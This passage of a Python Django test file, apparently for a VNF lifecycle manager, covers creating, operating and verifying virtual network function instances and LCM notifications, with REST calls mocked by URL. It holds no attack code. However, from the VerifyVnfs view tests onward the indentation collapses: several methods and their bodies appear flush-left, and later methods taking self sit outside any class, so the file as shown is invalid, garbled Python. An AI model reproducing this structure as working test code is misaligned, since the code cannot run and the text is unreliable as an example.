                    lastuptime=now_time()).save()
        VLInstModel(vldid="ext_mnet_network", ownertype=OWNER_TYPE.NS, ownerid=self.ns_inst_id,
                    vimid="{}").save()

    def tearDown(self):
        NfInstModel.objects.all().delete()
        JobModel.objects.all().delete()

    def _request_data(self):
        """CreateVnfs input dict derived from the view payload in self.data."""
        return {
            "ns_instance_id": ignore_case_get(self.data, "nsInstanceId"),
            "additional_param_for_ns": ignore_case_get(self.data, "additionalParamForNs"),
            "additional_param_for_vnf": ignore_case_get(self.data, "additionalParamForVnf"),
            "vnf_index": ignore_case_get(self.data, "vnfIndex")
        }

    def _mock_vals(self, package_id, subscription_val):
        """Canned call_req answers (keyed by URL) covering the whole create-vnf flow.

        package_id selects the catalog URL; subscription_val is the raw
        [ret, data, status] triple answered to the gvnfmdriver subscription call.
        """
        return {
            "/api/catalog/v1/vnfpackages/%s" % package_id:
                [0, json.JSONEncoder().encode(nf_package_info), "200"],
            "/external-system/esr-vnfm-list/esr-vnfm/1?depth=all":
                [0, json.JSONEncoder().encode(vnfm_info), "200"],
            "/api/ztevnfmdriver/v1/1/vnfs":
                [0, json.JSONEncoder().encode({"jobId": self.job_id, "vnfInstanceId": 3}), "200"],
            "/api/oof/v1/placement":
                [0, json.JSONEncoder().encode({}), "202"],
            "/api/resmgr/v1/vnf":
                [0, json.JSONEncoder().encode({}), "200"],
            "/api/ztevnfmdriver/v1/1/jobs/" + self.job_id + "?responseId=0":
                [0, json.JSONEncoder().encode({"jobid": self.job_id,
                                               "responsedescriptor": {"progress": "100",
                                                                      "status": JOB_MODEL_STATUS.FINISHED,
                                                                      "responseid": "3",
                                                                      "statusdescription": "creating",
                                                                      "errorcode": "0",
                                                                      "responsehistorylist": [
                                                                          {"progress": "0",
                                                                           "status": JOB_MODEL_STATUS.PROCESSING,
                                                                           "responseid": "2",
                                                                           "statusdescription": "creating",
                                                                           "errorcode": "0"}]}}), "200"],
            "api/gvnfmdriver/v1/1/subscriptions": subscription_val,
            "/api/resmgr/v1/vnfinfo":
                [0, json.JSONEncoder().encode(subscription_response_data), "200"],
        }

    @staticmethod
    def _install_mock(mock_call_req, mock_vals):
        """Dispatch restcall.call_req by its url argument (args[4])."""
        def side_effect(*args):
            return mock_vals[args[4]]
        mock_call_req.side_effect = side_effect

    @mock.patch.object(CreateVnfs, "run")
    def test_create_vnf_view(self, mock_run):
        """Posting the create request is accepted and persists an NF instance."""
        response = self.client.post("/api/nslcm/v1/ns/vnfs", data=self.data)
        self.assertEqual(status.HTTP_202_ACCEPTED, response.status_code)
        context = json.loads(response.content)
        self.assertTrue(NfInstModel.objects.filter(nfinstid=context["vnfInstId"]).exists())

    @mock.patch.object(time, "sleep")
    @mock.patch.object(restcall, "call_req")
    def test_create_vnf_thread_sucess(self, mock_call_req, mock_sleep):
        """Happy path: the worker ends with an ACTIVE instance and a FINISHED job."""
        mock_sleep.return_value = None
        nf_inst_id, job_id = create_vnfs.prepare_create_params()
        self._install_mock(mock_call_req, self._mock_vals(
            "zte_vbras", [0, json.JSONEncoder().encode(subscription_response_data), "200"]))
        CreateVnfs(self._request_data(), nf_inst_id, job_id).run()
        self.assertEqual(NfInstModel.objects.get(nfinstid=nf_inst_id).status, VNF_STATUS.ACTIVE)
        self.assertEqual(JobModel.objects.get(jobid=job_id).progress, JOB_PROGRESS.FINISHED)

    def test_create_vnf_thread_when_the_name_of_vnf_instance_already_exists(self):
        """A pre-existing NF instance name fails the worker: FAILED instance, ERROR job."""
        NfInstModel(nf_name="").save()
        nf_inst_id, job_id = create_vnfs.prepare_create_params()
        CreateVnfs(self._request_data(), nf_inst_id, job_id).run()
        self.assertEqual(NfInstModel.objects.get(nfinstid=nf_inst_id).status, VNF_STATUS.FAILED)
        self.assertEqual(JobModel.objects.get(jobid=job_id).progress, JOB_PROGRESS.ERROR)

    @mock.patch.object(time, "sleep")
    @mock.patch.object(restcall, "call_req")
    def test_create_vnf_thread_when_data_has_vnfd_id(self, mock_call_req, mock_sleep):
        """When the payload carries an explicit vnfdId, the catalog is queried by it."""
        mock_sleep.return_value = None
        nf_inst_id, job_id = create_vnfs.prepare_create_params()
        self._install_mock(mock_call_req, self._mock_vals(
            "data_has_vnfd_id", [0, json.JSONEncoder().encode({}), "200"]))
        self.data["additionalParamForVnf"][0]["additionalparam"]["vnfdId"] = "data_has_vnfd_id"
        CreateVnfs(self._request_data(), nf_inst_id, job_id).run()
        self.assertEqual(NfInstModel.objects.get(nfinstid=nf_inst_id).status, VNF_STATUS.ACTIVE)
        self.assertEqual(JobModel.objects.get(jobid=job_id).progress, JOB_PROGRESS.FINISHED)

    @mock.patch.object(restcall, "call_req")
    @mock.patch.object(CreateVnfs, "build_homing_request")
    def test_send_homing_request(self, mock_build_req, mock_call_req):
        """An accepted OOF placement answer is persisted as an OOFDataModel row."""
        nf_inst_id, job_id = create_vnfs.prepare_create_params()
        OOFDataModel.objects.all().delete()
        resp = {
            "requestId": "1234",
            "transactionId": "1234",
            "requestStatus": "accepted"
        }
        mock_build_req.return_value = {
            "requestInfo": {
                "transactionId": "1234",
                "requestId": "1234",
                "callbackUrl": "xx",
                "sourceId": "vfc",
                "requestType": "create",
                "numSolutions": 1,
                "optimizers": ["placement"],
                "timeout": 600
            },
            "placementInfo": {
                "placementDemands": [
                    {
                        "resourceModuleName": "vG",
                        "serviceResourceId": "1234",
                        "resourceModelInfo": {
                            "modelInvariantId": "1234",
                            "modelVersionId": "1234"
                        }
                    }
                ]
            },
            "serviceInfo": {
                "serviceInstanceId": "1234",
                "serviceName": "1234",
                "modelInfo": {
                    "modelInvariantId": "5678",
                    "modelVersionId": "7890"
                }
            }
        }
        mock_call_req.return_value = [0, json.JSONEncoder().encode(resp), "202"]
        CreateVnfs(self._request_data(), nf_inst_id, job_id).send_homing_request_to_OOF()
        ret = OOFDataModel.objects.filter(request_id="1234", transaction_id="1234")
        self.assertIsNotNone(ret)

    @mock.patch.object(time, "sleep")
    @mock.patch.object(restcall, "call_req")
    def test_create_vnf_thread_sucess_when_failed_to_subscribe_from_vnfm(self, mock_call_req, mock_sleep):
        """A failed subscription call (ret 1) must not fail the overall create flow."""
        mock_sleep.return_value = None
        nf_inst_id, job_id = create_vnfs.prepare_create_params()
        self._install_mock(mock_call_req, self._mock_vals(
            "zte_vbras", [1, json.JSONEncoder().encode(subscription_response_data), "200"]))
        CreateVnfs(self._request_data(), nf_inst_id, job_id).run()
        self.assertEqual(NfInstModel.objects.get(nfinstid=nf_inst_id).status, VNF_STATUS.ACTIVE)
        self.assertEqual(JobModel.objects.get(jobid=job_id).progress, JOB_PROGRESS.FINISHED)
class TestUpdateVnfsViews(TestCase):
    """Tests for the NFOperateService vnf operate/update worker."""

    def setUp(self):
        self.client = Client()
        self.data = {
            "terminationType": "forceful",
            "gracefulTerminationTimeout": "600",
            "additionalParams": ""
        }
        self.nf_inst_id = "test_update_vnf"
        self.m_nf_inst_id = "test_update_vnf_m_nf_inst_id"
        self.vnfm_inst_id = "test_update_vnf_vnfm_inst_id"
        self.vnfd_model = {"metadata": {"vnfdId": "1"}}
        NfInstModel.objects.all().delete()
        NfInstModel.objects.create(nfinstid=self.nf_inst_id,
                                   vnfm_inst_id=self.vnfm_inst_id,
                                   status=VNF_STATUS.NULL,
                                   mnfinstid=self.m_nf_inst_id,
                                   vnfd_model=self.vnfd_model
                                   )

    def tearDown(self):
        NfInstModel.objects.all().delete()

    @staticmethod
    def _install_call_req_mock(mock_call_req, job_id, job_status):
        """Mock the vnfm lookup, operate call and job poll; the poll reports job_status."""
        job_info = {
            "jobId": job_id,
            "responsedescriptor": {"status": job_status}
        }
        mock_vals = {
            "/external-system/esr-vnfm-list/esr-vnfm/test_update_vnf_vnfm_inst_id?depth=all":
                [0, json.JSONEncoder().encode(vnfm_info), "200"],
            "/api/ztevnfmdriver/v1/test_update_vnf_vnfm_inst_id/vnfs/test_update_vnf_m_nf_inst_id/operate":
                [0, json.JSONEncoder().encode({"jobId": job_id}), "200"],
            "/api/ztevnfmdriver/v1/test_update_vnf_vnfm_inst_id/jobs/" + job_id + "?responseId=0":
                [0, json.JSONEncoder().encode(job_info), "200"],
        }

        def side_effect(*args):
            return mock_vals[args[4]]
        mock_call_req.side_effect = side_effect

    @mock.patch.object(time, "sleep")
    @mock.patch.object(restcall, "call_req")
    def test_update_vnf_thread(self, mock_call_req, mock_sleep):
        """Successful operate: NF ends ACTIVE and the job FINISHED."""
        vnf_update_service = NFOperateService(self.nf_inst_id, self.data)
        self._install_call_req_mock(mock_call_req, vnf_update_service.job_id, JOB_MODEL_STATUS.FINISHED)
        vnf_update_service.run()
        nfinst = NfInstModel.objects.get(nfinstid=self.nf_inst_id)
        self.assertEqual(nfinst.status, VNF_STATUS.ACTIVE)
        self.assertEqual(JobModel.objects.get(jobid=vnf_update_service.job_id).progress, JOB_PROGRESS.FINISHED)

    def test_update_vnf_thread_when_no_nf(self):
        """Without an NF instance the service finishes its job in ERROR."""
        NfInstModel.objects.all().delete()
        vnf_update_service = NFOperateService(self.nf_inst_id, self.data)
        vnf_update_service.run()
        self.assertEqual(JobModel.objects.get(jobid=vnf_update_service.job_id).progress, JOB_PROGRESS.ERROR)

    @mock.patch.object(time, "sleep")
    @mock.patch.object(restcall, "call_req")
    def test_update_vnf_thread_when_nf_update_failed(self, mock_call_req, mock_sleep):
        """A vnfm job that ends in ERROR leaves the NF UPDATING and the job in ERROR."""
        vnf_update_service = NFOperateService(self.nf_inst_id, self.data)
        self._install_call_req_mock(mock_call_req, vnf_update_service.job_id, JOB_MODEL_STATUS.ERROR)
        vnf_update_service.run()
        nfinst = NfInstModel.objects.get(nfinstid=self.nf_inst_id)
        self.assertEqual(nfinst.status, VNF_STATUS.UPDATING)
        self.assertEqual(JobModel.objects.get(jobid=vnf_update_service.job_id).progress, JOB_PROGRESS.ERROR)
class TestVerifyVnfsViews(TestCase):
    def setUp(self):
        """Create one NF instance plus a verification job used by every test."""
        self.client = Client()
        self.url = "/api/nslcm/v1/vnfonboarding"
        self.package_id = "test_verify_vnfs_package_id"
        self.nf_inst_id = "test_verify_vnfs"
        self.m_nf_inst_id = "test_verify_vnfs_m_nf_inst_id"
        self.vnfm_inst_id = "test_verify_vnfs_vnfm_inst_id"
        self.vnfd_model = {"metadata": {"vnfdId": "1"}}
        self.data = {
            "PackageID": self.package_id,
        }
        # Job record the VerifyVnfs worker reports its progress against.
        self.job_id = JobUtil.create_job(JOB_TYPE.VNF, "verify_vnfs", self.nf_inst_id)
        # Start from a clean table so the instance created below is the only one.
        NfInstModel.objects.all().delete()
        NfInstModel.objects.create(package_id=self.package_id,
                                   nfinstid=self.nf_inst_id,
                                   vnfm_inst_id=self.vnfm_inst_id,
                                   status=VNF_STATUS.NULL,
                                   mnfinstid=self.m_nf_inst_id,
                                   vnfd_model=self.vnfd_model
                                   )
    def tearDown(self):
        """Drop all NF instances so later tests start clean."""
        NfInstModel.objects.all().delete()
@mock.patch.object(VerifyVnfs, "run")
def test_verify_vnfs_view(self, mock_run):
response = self.client.post(self.url, data=self.data)
self.assertEqual(status.HTTP_202_ACCEPTED, response.status_code)
def test_verify_vnfs_view_when_data_is_not_valid(self):
response = self.client.post(self.url, data={})
self.assertEqual(status.HTTP_409_CONFLICT, response.status_code)
@mock.patch.object(time, "sleep")
@mock.patch.object(restcall, "call_req")
def test_verify_vnfs_thread(self, mock_call_req, mock_sleep):
job_info_1 = {
"jobId": "test_1",
"responseDescriptor": {
"status": JOB_MODEL_STATUS.FINISHED,
"progress": 100,
"responseId": 0,
"statusDescription": ""
}
}
job_info_2 = {
"jobId": "test_2",
"responseDescriptor": {
"status": JOB_MODEL_STATUS.FINISHED,
"progress": 100,
"responseId": 0,
"statusDescription": ""
}
}
job_info_task = {
"jobId": "task_id",
"responseDescriptor": {
"status": JOB_MODEL_STATUS.FINISHED,
"progress": 100,
"responseId": 0,
"statusDescription": ""
}
}
mock_vals = {
"/api/nslcm/v1/vnfpackage":
[0, json.JSONEncoder().encode(job_info_1), "200"],
"/api/nslcm/v1/jobs/%s?responseId=%s" % ("test_1", 0):
[0, json.JSONEncoder().encode(job_info_1), "200"],
"/api/nslcm/v1/ns/ns_vnfs":
[0, json.JSONEncoder().encode({"jobId": "test_2", "vnfInstId": ""}), "200"],
"/api/nslcm/v1/jobs/%s?responseId=%s" % ("test_2", 0):
[0, json.JSONEncoder().encode(job_info_2), "200"],
"/openapi/vnfsdk/v1/functest/taskmanager/testtasks":
[0, json.JSONEncoder().encode({"TaskID": "task_id"}), "200"],
"/openapi/vnfsdk/v1/functest/taskmanager/testtasks/%s?responseId=%s" % ("task_id", 0):
[0, json.JSONEncoder().encode(job_info_task), "200"],
"/openapi/vnfsdk/v1/functest/taskmanager/testtasks/%s/result" % "task_id":
[0, json.JSONEncoder().encode({"TaskID": "task_id"}), "200"],
}
def side_effect(*args):
return mock_vals[args[4]]
mock_call_req.side_effect = side_effect
VerifyVnfs(self.data, self.job_id).run()
self.assertEqual(JobModel.objects.get(jobid=self.job_id).progress, JOB_PROGRESS.FINISHED)
@mock.patch.object(time, "sleep")
@mock.patch.object(restcall, "call_req")
def test_verify_vnfs_thread_when_failed_to_call_vnf_onboarding(self, mock_call_req, mock_sleep):
mock_vals = {
"/api/nslcm/v1/vnfpackage":
[1, json.JSONEncoder().encode({}), "200"]
}
def side_effect(*args):
return mock_vals[args[4]]
mock_call_req.side_effect = side_effect
VerifyVnfs(self.data, self.job_id).run()
self.assertEqual(JobModel.objects.get(jobid=self.job_id).progress, JOB_PROGRESS.ERROR)
@mock.patch.object(time, "sleep")
@mock.patch.object(restcall, "call_req")
def test_verify_vnfs_thread_when_do_on_boarding_failed_to_query_job(self, mock_call_req, mock_sleep):
job_info_1 = {
"jobId": "test_1",
"responseDescriptor": {
"status": JOB_MODEL_STATUS.FINISHED,
"progress": 100,
"responseId": 0,
"statusDescription": ""
}
}
mock_vals = {
"/api/nslcm/v1/vnfpackage":
[0, json.JSONEncoder().encode(job_info_1), "200"],
"/api/nslcm/v1/jobs/%s?responseId=%s" % ("test_1", 0):
[1, json.JSONEncoder().encode(job_info_1), "200"],
}
def side_effect(*args):
return mock_vals[args[4]]
mock_call_req.side_effect = side_effect
VerifyVnfs(self.data, self.job_id).run()
self.assertEqual(JobModel.objects.get(jobid=self.job_id).progress, JOB_PROGRESS.ERROR)
@mock.patch.object(time, "sleep")
@mock.patch.object(restcall, "call_req")
def test_verify_vnfs_thread_when_do_on_boarding_job_does_not_exist(self, mock_call_req, mock_sleep):
job_info_1 = {
"jobId": "test_1",
}
mock_vals = {
"/api/nslcm/v1/vnfpackage":
[0, json.JSONEncoder().encode(job_info_1), "200"],
"/api/nslcm/v1/jobs/%s?responseId=%s" % ("test_1", 0):
[0, json.JSONEncoder().encode(job_info_1), "200"],
}
def side_effect(*args):
return mock_vals[args[4]]
mock_call_req.side_effect = side_effect
VerifyVnfs(self.data, self.job_id).run()
self.assertEqual(JobModel.objects.get(jobid=self.job_id).progress, JOB_PROGRESS.ERROR)
@mock.patch.object(time, "sleep")
@mock.patch.object(restcall, "call_req")
def test_verify_vnfs_thread_when_do_on_boarding_job_process_error(self, mock_call_req, mock_sleep):
job_info_1 = {
"jobId": "test_1",
"responseDescriptor": {
"status": JOB_MODEL_STATUS.FINISHED,
"progress": JOB_PROGRESS.ERROR,
"responseId": 1,
"statusDescription": "already onBoarded"
}
}
job_info_2 = {
"jobId": "test_2",
"responseDescriptor": {
"status": JOB_MODEL_STATUS.FINISHED,
"progress": 100,
"responseId": 0,
"statusDescription": ""
}
}
job_info_task = {
"jobId": "task_id",
"responseDescriptor": {
"status": JOB_MODEL_STATUS.FINISHED,
"progress": 100,
"responseId": 0,
"statusDescription": ""
}
}
mock_vals = {
"/api/nslcm/v1/vnfpackage":
[0, json.JSONEncoder().encode(job_info_1), "200"],
"/api/nslcm/v1/jobs/%s?responseId=%s" % ("test_1", 0):
[0, json.JSONEncoder().encode(job_info_1), "200"],
"/api/nslcm/v1/ns/ns_vnfs":
[0, json.JSONEncoder().encode({"jobId": "test_2", "vnfInstId": ""}), "200"],
"/api/nslcm/v1/jobs/%s?responseId=%s" % ("test_2", 0):
[0, json.JSONEncoder().encode(job_info_2), "200"],
"/openapi/vnfsdk/v1/functest/taskmanager/testtasks":
[0, json.JSONEncoder().encode({"TaskID": "task_id"}), "200"],
"/openapi/vnfsdk/v1/functest/taskmanager/testtasks/%s?responseId=%s" % ("task_id", 0):
[0, json.JSONEncoder().encode(job_info_task), "200"],
"/openapi/vnfsdk/v1/functest/taskmanager/testtasks/%s/result" % "task_id":
[0, json.JSONEncoder().encode({"TaskID": "task_id"}), "200"],
}
def side_effect(*args):
return mock_vals[args[4]]
mock_call_req.side_effect = side_effect
VerifyVnfs(self.data, self.job_id).run()
self.assertEqual(JobModel.objects.get(jobid=self.job_id).progress, JOB_PROGRESS.FINISHED)
@mock.patch.object(time, "sleep")
@mock.patch.object(restcall, "call_req")
def test_verify_vnfs_thread_when_failed_to_call_inst_vnf(self, mock_call_req, mock_sleep):
job_info_1 = {
"jobId": "test_1",
"responseDescriptor": {
"status": JOB_MODEL_STATUS.FINISHED,
"progress": 100,
"responseId": 0,
"statusDescription": ""
}
}
mock_vals = {
"/api/nslcm/v1/vnfpackage":
[0, json.JSONEncoder().encode(job_info_1), "200"],
"/api/nslcm/v1/jobs/%s?responseId=%s" % ("test_1", 0):
[0, json.JSONEncoder().encode(job_info_1), "200"],
"/api/nslcm/v1/ns/ns_vnfs":
[1, json.JSONEncoder().encode({"jobId": "test_2", "vnfInstId": ""}), "200"],
}
def side_effect(*args):
return mock_vals[args[4]]
mock_call_req.side_effect = side_effect
VerifyVnfs(self.data, self.job_id).run()
self.assertEqual(JobModel.objects.get(jobid=self.job_id).progress, JOB_PROGRESS.ERROR)
@mock.patch.object(time, "sleep")
@mock.patch.object(restcall, "call_req")
def test_verify_vnfs_thread_when_do_term_vnf_job_process_error(self, mock_call_req, mock_sleep):
job_info_1 = {
"jobId": "test_1",
"responseDescriptor": {
"status": JOB_MODEL_STATUS.FINISHED,
"progress": 100,
"responseId": 0,
"statusDescription": ""
}
}
job_info_2 = {
"jobId": "test_2",
"responseDescriptor": {
"status": JOB_MODEL_STATUS.FINISHED,
"progress": JOB_PROGRESS.ERROR,
"responseId": 0,
"statusDescription": ""
}
}
mock_vals = {
"/api/nslcm/v1/vnfpackage":
[0, json.JSONEncoder().encode(job_info_1), "200"],
"/api/nslcm/v1/jobs/%s?responseId=%s" % ("test_1", 0):
[0, json.JSONEncoder().encode(job_info_1), "200"],
"/api/nslcm/v1/ns/ns_vnfs":
[0, json.JSONEncoder().encode({"jobId": "test_2", "vnfInstId": ""}), "200"],
"/api/nslcm/v1/jobs/%s?responseId=%s" % ("test_2", 0):
[0, json.JSONEncoder().encode(job_info_2), "200"],
}
def side_effect(*args):
return mock_vals[args[4]]
mock_call_req.side_effect = side_effect
VerifyVnfs(self.data, self.job_id).run()
self.assertEqual(JobModel.objects.get(jobid=self.job_id).progress, JOB_PROGRESS.ERROR)
@mock.patch.object(time, "sleep")
@mock.patch.object(restcall, "call_req")
def test_verify_vnfs_thread_when_failed_to_call_func_test(self, mock_call_req, mock_sleep):
    """Overall job ends in ERROR when the functest task-creation call returns a non-zero code."""
    inst_job = {
        "jobId": "test_1",
        "responseDescriptor": {
            "status": JOB_MODEL_STATUS.FINISHED,
            "progress": 100,
            "responseId": 0,
            "statusDescription": ""
        }
    }
    term_job = {
        "jobId": "test_2",
        "responseDescriptor": {
            "status": JOB_MODEL_STATUS.FINISHED,
            "progress": 100,
            "responseId": 0,
            "statusDescription": ""
        }
    }
    # Canned REST responses keyed by request URL; the functest call fails (ret code 1).
    responses = {
        "/api/nslcm/v1/vnfpackage": [0, json.dumps(inst_job), "200"],
        "/api/nslcm/v1/jobs/test_1?responseId=0": [0, json.dumps(inst_job), "200"],
        "/api/nslcm/v1/ns/ns_vnfs": [0, json.dumps({"jobId": "test_2", "vnfInstId": ""}), "200"],
        "/api/nslcm/v1/jobs/test_2?responseId=0": [0, json.dumps(term_job), "200"],
        "/openapi/vnfsdk/v1/functest/taskmanager/testtasks": [1, json.dumps({"TaskID": "task_id"}), "200"],
    }
    mock_call_req.side_effect = lambda *args: responses[args[4]]
    VerifyVnfs(self.data, self.job_id).run()
    self.assertEqual(JobModel.objects.get(jobid=self.job_id).progress, JOB_PROGRESS.ERROR)
@mock.patch.object(time, "sleep")
@mock.patch.object(restcall, "call_req")
def test_verify_vnfs_thread_when_do_func_test_failed_query_job(self, mock_call_req, mock_sleep):
    """Overall job ends in ERROR when polling the functest task status fails."""
    inst_job = {
        "jobId": "test_1",
        "responseDescriptor": {
            "status": JOB_MODEL_STATUS.FINISHED,
            "progress": 100,
            "responseId": 0,
            "statusDescription": ""
        }
    }
    term_job = {
        "jobId": "test_2",
        "responseDescriptor": {
            "status": JOB_MODEL_STATUS.FINISHED,
            "progress": 100,
            "responseId": 0,
            "statusDescription": ""
        }
    }
    functest_job = {
        "jobId": "task_id",
        "responseDescriptor": {
            "status": JOB_MODEL_STATUS.FINISHED,
            "progress": 100,
            "responseId": 0,
            "statusDescription": ""
        }
    }
    # Canned REST responses keyed by request URL; the task-status poll fails (ret code 1).
    responses = {
        "/api/nslcm/v1/vnfpackage": [0, json.dumps(inst_job), "200"],
        "/api/nslcm/v1/jobs/test_1?responseId=0": [0, json.dumps(inst_job), "200"],
        "/api/nslcm/v1/ns/ns_vnfs": [0, json.dumps({"jobId": "test_2", "vnfInstId": ""}), "200"],
        "/api/nslcm/v1/jobs/test_2?responseId=0": [0, json.dumps(term_job), "200"],
        "/openapi/vnfsdk/v1/functest/taskmanager/testtasks": [0, json.dumps({"TaskID": "task_id"}), "200"],
        "/openapi/vnfsdk/v1/functest/taskmanager/testtasks/task_id?responseId=0": [1, json.dumps(functest_job), "200"],
    }
    mock_call_req.side_effect = lambda *args: responses[args[4]]
    VerifyVnfs(self.data, self.job_id).run()
    self.assertEqual(JobModel.objects.get(jobid=self.job_id).progress, JOB_PROGRESS.ERROR)
@mock.patch.object(time, "sleep")
@mock.patch.object(restcall, "call_req")
def test_verify_vnfs_thread_when_do_func_test_job_does_not_exist(self, mock_call_req, mock_sleep):
    """Overall job ends in ERROR when the functest task status reply has no responseDescriptor."""
    inst_job = {
        "jobId": "test_1",
        "responseDescriptor": {
            "status": JOB_MODEL_STATUS.FINISHED,
            "progress": 100,
            "responseId": 0,
            "statusDescription": ""
        }
    }
    term_job = {
        "jobId": "test_2",
        "responseDescriptor": {
            "status": JOB_MODEL_STATUS.FINISHED,
            "progress": 100,
            "responseId": 0,
            "statusDescription": ""
        }
    }
    # Functest task reply deliberately lacks a responseDescriptor.
    functest_job = {
        "jobId": "task_id",
    }
    responses = {
        "/api/nslcm/v1/vnfpackage": [0, json.dumps(inst_job), "200"],
        "/api/nslcm/v1/jobs/test_1?responseId=0": [0, json.dumps(inst_job), "200"],
        "/api/nslcm/v1/ns/ns_vnfs": [0, json.dumps({"jobId": "test_2", "vnfInstId": ""}), "200"],
        "/api/nslcm/v1/jobs/test_2?responseId=0": [0, json.dumps(term_job), "200"],
        "/openapi/vnfsdk/v1/functest/taskmanager/testtasks": [0, json.dumps({"TaskID": "task_id"}), "200"],
        "/openapi/vnfsdk/v1/functest/taskmanager/testtasks/task_id?responseId=0": [0, json.dumps(functest_job), "200"],
        "/openapi/vnfsdk/v1/functest/taskmanager/testtasks/task_id/result": [0, json.dumps({"TaskID": "task_id"}), "200"],
    }
    mock_call_req.side_effect = lambda *args: responses[args[4]]
    VerifyVnfs(self.data, self.job_id).run()
    self.assertEqual(JobModel.objects.get(jobid=self.job_id).progress, JOB_PROGRESS.ERROR)
@mock.patch.object(time, "sleep")
@mock.patch.object(restcall, "call_req")
def test_verify_vnfs_thread_when_do_func_test_job_process_error(self, mock_call_req, mock_sleep):
    """Functest task reports ERROR progress; the flow still finishes with JOB_PROGRESS.FINISHED."""
    inst_job = {
        "jobId": "test_1",
        "responseDescriptor": {
            "status": JOB_MODEL_STATUS.FINISHED,
            "progress": 100,
            "responseId": 0,
            "statusDescription": ""
        }
    }
    term_job = {
        "jobId": "test_2",
        "responseDescriptor": {
            "status": JOB_MODEL_STATUS.FINISHED,
            "progress": 100,
            "responseId": 0,
            "statusDescription": ""
        }
    }
    functest_job = {
        "jobId": "task_id",
        "responseDescriptor": {
            "status": JOB_MODEL_STATUS.ERROR,
            "progress": JOB_PROGRESS.ERROR,
            "responseId": 1,
            "statusDescription": "already onBoarded"
        }
    }
    responses = {
        "/api/nslcm/v1/vnfpackage": [0, json.dumps(inst_job), "200"],
        "/api/nslcm/v1/jobs/test_1?responseId=0": [0, json.dumps(inst_job), "200"],
        "/api/nslcm/v1/ns/ns_vnfs": [0, json.dumps({"jobId": "test_2", "vnfInstId": ""}), "200"],
        "/api/nslcm/v1/jobs/test_2?responseId=0": [0, json.dumps(term_job), "200"],
        "/openapi/vnfsdk/v1/functest/taskmanager/testtasks": [0, json.dumps({"TaskID": "task_id"}), "200"],
        "/openapi/vnfsdk/v1/functest/taskmanager/testtasks/task_id?responseId=0": [0, json.dumps(functest_job), "200"],
        "/openapi/vnfsdk/v1/functest/taskmanager/testtasks/task_id/result": [0, json.dumps({"TaskID": "task_id"}), "200"],
    }
    mock_call_req.side_effect = lambda *args: responses[args[4]]
    VerifyVnfs(self.data, self.job_id).run()
    self.assertEqual(JobModel.objects.get(jobid=self.job_id).progress, JOB_PROGRESS.FINISHED)
@mock.patch.object(time, "sleep")
@mock.patch.object(restcall, "call_req")
def test_verify_vnfs_thread_when_do_func_test_failed_to_get_func_test_result(self, mock_call_req, mock_sleep):
    """Overall job ends in ERROR when fetching the functest result returns a non-zero code."""
    inst_job = {
        "jobId": "test_1",
        "responseDescriptor": {
            "status": JOB_MODEL_STATUS.FINISHED,
            "progress": 100,
            "responseId": 0,
            "statusDescription": ""
        }
    }
    term_job = {
        "jobId": "test_2",
        "responseDescriptor": {
            "status": JOB_MODEL_STATUS.FINISHED,
            "progress": 100,
            "responseId": 0,
            "statusDescription": ""
        }
    }
    functest_job = {
        "jobId": "task_id",
        "responseDescriptor": {
            "status": JOB_MODEL_STATUS.FINISHED,
            "progress": 100,
            "responseId": 1,
            "statusDescription": "already onBoarded"
        }
    }
    # The final result fetch fails (ret code 1); everything before it succeeds.
    responses = {
        "/api/nslcm/v1/vnfpackage": [0, json.dumps(inst_job), "200"],
        "/api/nslcm/v1/jobs/test_1?responseId=0": [0, json.dumps(inst_job), "200"],
        "/api/nslcm/v1/ns/ns_vnfs": [0, json.dumps({"jobId": "test_2", "vnfInstId": ""}), "200"],
        "/api/nslcm/v1/jobs/test_2?responseId=0": [0, json.dumps(term_job), "200"],
        "/openapi/vnfsdk/v1/functest/taskmanager/testtasks": [0, json.dumps({"TaskID": "task_id"}), "200"],
        "/openapi/vnfsdk/v1/functest/taskmanager/testtasks/task_id?responseId=0": [0, json.dumps(functest_job), "200"],
        "/openapi/vnfsdk/v1/functest/taskmanager/testtasks/task_id/result": [1, json.dumps({"TaskID": "task_id"}), "200"],
    }
    mock_call_req.side_effect = lambda *args: responses[args[4]]
    VerifyVnfs(self.data, self.job_id).run()
    self.assertEqual(JobModel.objects.get(jobid=self.job_id).progress, JOB_PROGRESS.ERROR)
class TestLcmNotifyViews(TestCase):
    """Tests for NotifyLcm.do_biz: applying LCM notifications (VNFC/VL/CP changes)
    to the inventory models for the ADDED, REMOVED and MODIFIED change types."""

    def setUp(self):
        """Create one NfInstModel row and a notification payload with one
        ADDED VNFC, VL and CP each."""
        self.client = Client()
        self.data = {
            "status": "START",
            "operation": "Instantiate",
            "jobId": "",
            "vnfdmodule": "",
            "affectedVnfc": [{"vnfcInstanceId": "vnfc_instance_id",
                              "vduId": "vdu_id",
                              "changeType": VNFC_CHANGE_TYPE.ADDED,
                              "vimId": "vim_id",
                              "vmId": "vm_id",
                              "vmName": "vm_name"
                              }],
            "affectedVl": [{"vlInstanceId": "vl_instance_id",
                            "vldId": "vld_id",
                            "changeType": VNFC_CHANGE_TYPE.ADDED,
                            "networkResource": {
                                "resourceType": NETWORK_RESOURCE_TYPE.NETWORK,
                                "resourceId": "resource_id",
                                "resourceName": "resource_name"
                            }
                            }],
            "affectedCp": [{"changeType": VNFC_CHANGE_TYPE.ADDED,
                            "virtualLinkInstanceId": "virtual_link_instance_id",
                            "cpInstanceId": "cp_instance_id",
                            "cpdId": "cpd_id",
                            "ownerType": 0,
                            "ownerId": "owner_id",
                            "portResource": {
                                "vimId": "vim_id",
                                "resourceId": "resource_id",
                                "resourceName": "resource_name",
                                "tenant": "tenant",
                                "ipAddress": "ip_address",
                                "macAddress": "mac_address",
                                "instId": "inst_id"
                            }
                            }],
            "affectedVirtualStorage": [{}]
        }
        self.nf_inst_id = "test_lcm_notify"
        self.m_nf_inst_id = "test_lcm_notify_m_nf_inst_id"
        self.vnfm_inst_id = "test_lcm_notify_vnfm_inst_id"
        self.vnfd_model = {"metadata": {"vnfdId": "1"}}
        self.url = "/api/nslcm/v1/ns/%s/vnfs/%s/Notify" % (self.m_nf_inst_id, self.vnfm_inst_id)
        NfInstModel.objects.all().delete()
        NfInstModel.objects.create(nfinstid=self.nf_inst_id,
                                   vnfm_inst_id=self.vnfm_inst_id,
                                   status=VNF_STATUS.NULL,
                                   mnfinstid=self.m_nf_inst_id,
                                   vnfd_model=self.vnfd_model
                                   )

    def tearDown(self):
        """Remove every inventory row the tests may have created."""
        NfInstModel.objects.all().delete()
        VNFCInstModel.objects.all().delete()
        VmInstModel.objects.all().delete()
        VLInstModel.objects.all().delete()
        PortInstModel.objects.all().delete()
        CPInstModel.objects.all().delete()

